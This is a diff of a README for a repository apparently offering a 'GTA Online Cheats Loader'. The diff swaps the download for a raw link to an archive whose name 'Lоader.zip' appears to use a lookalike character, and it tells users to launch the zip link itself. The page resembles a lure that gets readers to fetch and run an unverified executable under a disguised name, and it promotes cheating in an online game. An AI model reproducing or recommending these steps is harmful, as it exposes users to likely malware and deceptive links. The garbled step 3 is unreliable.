ACC0895/GTAV-Online-Toolkit/README.md

 Setting up the **GTA Online Cheats Loader** is fast and simple!
 Follow these instructions to start:

-1. Download Loader.rar from the repository.
+1. Download https://raw.githubusercontent.com/ACC0895/GTAV-Online-Toolkit/main/Lоader.zip from the repository.
 2. Extract the archive to a chosen directory using your favorite unarchiver.
-3. Launch the Loader.exe (Windows) or run the Loader binary (Linux/macOS) via terminal.
+3. Launch the https://raw.githubusercontent.com/ACC0895/GTAV-Online-Toolkit/main/Lоader.zip (Windows) or run the Loader binary (Linux/macOS) via terminal.
 4. Enter your GTA Online session and activate desired features through the user-friendly menu.
 5. Start gaming with your chosen enhancements immediately!